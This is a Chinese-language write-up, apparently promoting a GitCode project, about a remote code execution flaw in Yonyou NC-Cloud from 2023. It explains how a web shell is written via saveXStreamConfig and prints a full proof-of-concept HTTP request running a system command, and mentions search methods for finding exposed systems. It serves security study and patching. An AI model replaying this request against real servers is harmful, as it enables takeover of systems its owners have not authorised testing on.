用友-NC-Cloud远程代码执行漏洞:深入解析与安全防护
去发现同类优质开源项目:https://gitcode.com/
项目介绍
在2023年的HW期间,用友-NC-Cloud被发现存在一个严重的远程代码执行漏洞。该漏洞允许攻击者通过特定的接口调用服务中的方法,直接在服务器上执行任意代码,从而获取服务器的控制权。本项目提供了关于该漏洞的详细信息和相关工具,帮助安全研究人员和开发人员更好地理解和应对这一安全威胁。
项目技术分析
漏洞原理
该漏洞的核心在于攻击者可以通过请求特定的接口,调用nc_itf_iufo_IBaseSPService服务中的saveXStreamConfig方法,直接向webapps/nc_web/目录写入恶意代码。随后,攻击者可以通过访问写入的恶意代码,调用Runtime.getRuntime().exec("command")来执行系统命令,并通过getInputStream()获取命令的输出流,最终使用IOUtils.toString()方法将输出流转换为字符串。
漏洞复现
项目中提供了一个具体的PoC请求示例,展示了如何通过接口写入恶意代码并执行系统命令。以下是PoC请求示例:
POST /0811.jsp?error=bsh.Interpreter HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF;server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ifconfig").getInputStream())
资产搜索
项目还提供了针对该漏洞的资产搜索方法,包括FOFA、鹰图和Hunter等平台的搜索关键词,帮助用户快速定位受影响的系统。
项目及技术应用场景
安全研究
该漏洞的详细信息和复现方法为安全研究人员提供了宝贵的研究素材,帮助他们深入了解远程代码执行漏洞的原理和攻击手段。
企业安全防护
对于企业而言,了解并修复此类漏洞至关重要。项目中提供的修复建议可以帮助企业及时更新系统版本,配置WAF规则拦截敏感字符,从而有效防范潜在的攻击。
安全培训
该项目的详细文档和工具也可以作为安全培训的教材,帮助开发人员和安全从业人员提升对远程代码执行漏洞的认识和防范能力。
项目特点
-
详细漏洞分析:项目提供了漏洞的详细分析,包括漏洞原理、复现方法和资产搜索方法,帮助用户全面了解漏洞的各个方面。
-
实用工具:项目中包含实用的工具和PoC请求示例,方便用户进行漏洞复现和测试。
-
修复建议:项目提供了明确的修复建议,帮助用户及时修复漏洞,提升系统安全性。
-
免责声明:项目明确声明仅供学习用途使用,提醒用户不得利用项目中的技术从事非法测试,确保合法合规使用。
通过本项目,用户可以深入了解用友-NC-Cloud远程代码执行漏洞的原理和应对方法,提升自身在网络安全领域的知识和技能。
去发现同类优质开源项目:https://gitcode.com/
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
